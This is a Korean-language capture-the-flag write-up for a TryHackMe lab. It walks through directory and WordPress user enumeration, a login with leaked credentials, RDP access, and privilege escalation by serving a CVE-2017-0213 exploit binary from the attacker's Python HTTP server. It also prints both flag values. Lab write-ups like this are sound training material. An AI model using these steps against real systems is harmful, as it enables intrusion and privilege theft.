TryHackMe 룸 링크
tryhackme 컴퓨터 IP를 복사하고 브라우저를 누르세요. 이렇게 표시됩니다.
dirsearch 도구에서 이 명령을 실행해야 합니다.
sudo dirsearch --full-url -w /usr/share/wordlists/Seclist/dirb/directory-list-2.3-medium.txt -u http://10.10.126.180/
이 명령을 성공적으로 실행하면 retro
라는 숨겨진 디렉터리를 찾을 수 있습니다.
/retro
보시다시피 WordPress CMS가 감지되었습니다.
또한 WordPress 기본 관리자 로그인 페이지를 찾았습니다.
이제 대상 웹사이트의 사용자를 열거하기 위해 wpscan 도구를 사용하여 스캔을 시작합니다.
wpscan --url http://10.10.126.180/retro -e u
wade
라는 사용자를 찾았습니다.
블로그 게시물 섹션에서 자격 증명을 찾았습니다. parzival
WordPress 대시보드에 성공적으로 로그인했습니다.
이제 원격 데스크톱 프로토콜을 사용하여 로그인합니다. 저는 Remmina를 사용하고 있습니다.
원격 PC에 로그인한 후 데스크톱에서 user.txt
파일을 찾았습니다.
3b99fbdc6d430bfb51c72c651a261927
이제 원격 Windows PC에서 작은 search
아이콘을 클릭하고 cmd
입력하고 Enter
누르세요. 명령 프롬프트가 열립니다. 이제 이 명령을 입력하고 시스템 정보를 확인하세요.
systeminfo
이제 Exploit 링크로 이동하세요. 그리고 zip 파일을 다운로드해서 압축을 풀어보세요.
CVE-2017-0213_x64
파일을 추출한 로컬 컴퓨터에서 Python 서버를 엽니다.
sudo python3 -m http.server --bind your.tun0.ip 8080
링크가 생성됩니다. 이제 링크를 복사하고 원격 PC 브라우저를 누르십시오. 그런 다음 EXE 파일을 다운로드하고 계속 다운로드하려면 보관하세요.
다운로드가 완료되면 클릭하여 이 프로그램을 실행하세요. 루트 플래그를 얻으려면 아래 명령을 입력하십시오.
cd / cd Users/Administrator/Desktop type root.txt.txt
7958b569565d7bd88d10c6f22d1c4063